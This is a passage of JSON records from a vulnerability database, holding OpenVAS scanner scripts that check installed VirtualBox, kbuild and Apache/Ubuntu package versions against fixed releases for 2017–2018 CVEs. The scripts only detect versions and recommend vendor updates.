Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813302\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-2860\", \"CVE-2018-0739\", \"CVE-2018-2842\", \"CVE-2018-2843\",\n \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2831\", \"CVE-2018-2830\",\n \"CVE-2018-2837\", \"CVE-2018-2836\", \"CVE-2018-2835\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-18 19:09:04 +0530 (Wed, 18 Apr 2018)\");\n script_name(\"Oracle VirtualBox Security Updates (apr2018-3678067) 01 - Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n unspecified errors in 'Core' component of Oracle VM VirtualBox.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to affect confidentiality, availability and integrity via\n unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.1.36, 5.2.x\n prior to 5.2.10 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.2.10 or\n 5.1.36 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_win.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nvirtualVer = infos['version'];\npath = infos['location'];\n\nif(virtualVer =~ \"^5\\.2\" && (version_is_less(version:virtualVer, test_version:\"5.2.10\"))){\n fix = \"5.2.10\";\n}\n\nelse if(version_is_less(version:virtualVer, test_version:\"5.1.36\")){\n fix = \"5.1.36\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:virtualVer, fixed_version: fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310813303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813303", "type": "openvas", "title": "Oracle VirtualBox Security Updates (apr2018-3678067) 02 - Linux", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VirtualBox Security Updates (apr2018-3678067) 02 - Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813303\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-2860\", \"CVE-2018-0739\", \"CVE-2018-2842\", \"CVE-2018-2843\",\n \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2831\", \"CVE-2018-2830\",\n \"CVE-2018-2837\", \"CVE-2018-2836\", \"CVE-2018-2835\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-18 19:09:08 +0530 (Wed, 18 Apr 2018)\");\n script_name(\"Oracle VirtualBox Security Updates (apr2018-3678067) 02 - Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n unspecified errors in 'Core' component of Oracle VM VirtualBox.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to affect confidentiality, availability and integrity via\n unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.1.36, 5.2.x\n prior to 5.2.10 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.2.10 or\n 5.1.36 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/VirtualBox/Lin/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nvirtualVer = infos['version'];\npath = infos['location'];\n\nif(virtualVer =~ \"^5\\.2\" && (version_is_less(version:virtualVer, test_version:\"5.2.10\"))){\n fix = \"5.2.10\";\n}\n\nelse if(version_is_less(version:virtualVer, test_version:\"5.1.36\")){\n fix = \"5.1.36\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:virtualVer, fixed_version: fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310813304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813304", "type": "openvas", "title": "Oracle VirtualBox Security Updates (apr2018-3678067) 03 - MAC OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VirtualBox Security Updates (apr2018-3678067) 03 - MAC OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813304\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-2860\", \"CVE-2018-0739\", \"CVE-2018-2842\", \"CVE-2018-2843\",\n \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2831\", \"CVE-2018-2830\",\n \"CVE-2018-2837\", \"CVE-2018-2836\", \"CVE-2018-2835\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-18 19:09:11 +0530 (Wed, 18 Apr 2018)\");\n script_name(\"Oracle VirtualBox Security Updates (apr2018-3678067) 03 - MAC OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Oracle VM\n VirtualBox and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n unspecified errors in 'Core' component of Oracle VM VirtualBox.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to affect confidentiality, availability and integrity via\n unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.1.36, 5.2.x\n prior to 5.2.10 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.2.10 or\n 5.1.36 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_oracle_virtualbox_detect_macosx.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nvirtualVer = infos['version'];\npath = infos['location'];\n\nif(virtualVer =~ \"^5\\.2\" && (version_is_less(version:virtualVer, test_version:\"5.2.10\"))){\n fix = \"5.2.10\";\n}\n\nelse if(version_is_less(version:virtualVer, test_version:\"5.1.36\")){\n fix = \"5.1.36\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:virtualVer, fixed_version: fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T16:46:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-3091", "CVE-2018-2687", "CVE-2018-2860", "CVE-2018-3055", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2698", "CVE-2018-2693", "CVE-2018-2845", "CVE-2018-2690", "CVE-2018-3086", "CVE-2018-2676", "CVE-2017-5715", "CVE-2018-2837", "CVE-2018-3089", "CVE-2018-0739", "CVE-2018-2688", "CVE-2018-3087", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2685", "CVE-2018-3085", "CVE-2018-2843", "CVE-2018-3005", "CVE-2018-3090", "CVE-2018-2686", "CVE-2018-2694", "CVE-2018-2689", "CVE-2018-3088"], "description": "The remote host is missing an update for the ", "modified": "2020-06-03T00:00:00", "published": "2018-08-27T00:00:00", "id": "OPENVAS:1361412562310851869", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851869", "type": "openvas", "title": "openSUSE: Security Advisory for kbuild (openSUSE-SU-2018:2524-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851869\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 07:20:54 +0200 (Mon, 27 Aug 2018)\");\n script_cve_id(\"CVE-2017-5715\", \"CVE-2018-0739\", \"CVE-2018-2676\", \"CVE-2018-2685\", \"CVE-2018-2686\", \"CVE-2018-2687\", \"CVE-2018-2688\", \"CVE-2018-2689\", \"CVE-2018-2690\", \"CVE-2018-2693\", \"CVE-2018-2694\", \"CVE-2018-2698\", \"CVE-2018-2830\", \"CVE-2018-2831\", \"CVE-2018-2835\", \"CVE-2018-2836\", \"CVE-2018-2837\", \"CVE-2018-2842\", \"CVE-2018-2843\", \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2860\", \"CVE-2018-3005\", \"CVE-2018-3055\", \"CVE-2018-3085\", \"CVE-2018-3086\", \"CVE-2018-3087\", \"CVE-2018-3088\", \"CVE-2018-3089\", \"CVE-2018-3090\", \"CVE-2018-3091\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kbuild (openSUSE-SU-2018:2524-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kbuild'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for kbuild, virtualbox fixes the following issues:\n\n kbuild changes:\n\n - Update to version 0.1.9998svn3110\n\n - Do not assume glibc glob internals\n\n - Support GLIBC glob interface version 2\n\n - Fix build failure (boo#1079838)\n\n - Fix build with GCC7 (boo#1039375)\n\n - Fix build by disabling vboxvideo_drv.so\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3\n\n zypper in -t patch openSUSE-2018-938=1\");\n\n script_tag(name:\"affected\", value:\"kbuild, on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2524-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-08/msg00080.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"kbuild\", rpm:\"kbuild~0.1.9998svn3110~4.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kbuild-debuginfo\", rpm:\"kbuild-debuginfo~0.1.9998svn3110~4.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kbuild-debugsource\", rpm:\"kbuild-debugsource~0.1.9998svn3110~4.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.2.18_k4.4.143_65~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.2.18_k4.4.143_65~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.2.18_k4.4.143_65~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.2.18_k4.4.143_65~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-vnc\", rpm:\"virtualbox-vnc~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-source\", rpm:\"virtualbox-guest-source~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.2.18~56.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310843313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843313", "type": "openvas", "title": "Ubuntu Update for apache2 USN-3425-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3425_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for apache2 USN-3425-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843313\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 11:45:15 +0200 (Wed, 20 Sep 2017)\");\n script_cve_id(\"CVE-2017-9798\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for apache2 USN-3425-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Hanno Bck discovered that the Apache HTTP\n Server incorrectly handled Limit directives in .htaccess files. In certain\n configurations, a remote attacker could possibly use this issue to read\n arbitrary server memory, including sensitive information. This issue is known as\n Optionsbleed.\");\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3425-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3425-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.7-1ubuntu4.18\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-3ubuntu2.3\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu3.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-08T18:58:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "description": "Apache HTTP server allows remote attackers to read secret data\n from process memory if the Limit directive can be set in a user", "modified": "2020-05-06T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310112048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112048", "type": "openvas", "title": "Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112048\");\n script_version(\"2020-05-06T12:58:00+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 12:58:00 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 12:53:35 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n script_name(\"Apache HTTP Server OPTIONS Memory Leak Vulnerability (Optionsbleed)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n script_xref(name:\"URL\", value:\"http://openwall.com/lists/oss-security/2017/09/18/2\");\n script_xref(name:\"URL\", value:\"https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html\");\n script_xref(name:\"URL\", 